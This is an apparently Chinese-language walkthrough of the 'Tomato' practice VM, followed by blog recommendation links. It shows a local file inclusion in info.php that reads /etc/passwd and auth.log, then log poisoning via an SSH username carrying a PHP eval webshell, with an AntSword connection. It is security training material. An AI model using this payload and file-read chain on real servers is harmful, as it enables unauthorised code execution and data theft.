Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
筵陌7 分钟前
Linux 进程控制
linux
天降大任女士7 分钟前
第一章 Linux的例行性工作(计划任务)
linux·运维·服务器
背太阳的牧羊人8 分钟前
在 Ubuntu 服务器上 下载 Clash 文件使用代理
linux·服务器·ubuntu
枷锁—sha9 分钟前
【HW系列】—C2远控服务器(webshell链接工具, metasploit、cobaltstrike)的漏洞特征流量特征
运维·服务器·网络·测试工具·web安全·网络安全
原创资讯9 分钟前
IT选型指南:电信行业需要怎样的服务器?
运维·服务器
IT葛大侠11 分钟前
STP配置
网络
JASON丶LI12 分钟前
家庭路由器改装,搭建openwrt旁路由以及手机存储服务器,实现外网节点转发、内网穿透、远程存储、接入满血DeepSeek方案
服务器·物联网·容器·智能路由器·openwrt
编程乐学(Arfan开发工程师)14 分钟前
28、请求处理-【源码分析】-请求映射原理
java·前端·spring boot·后端·spring
小艺E14 分钟前
【技术测评】黑龙江亿林网络「启强 Plus」服务器实测:56 核 32G 配置下的性能表现与应用场景解析
运维·服务器·网络
C-200216 分钟前
kali系统的安装及配置
linux·运维·服务器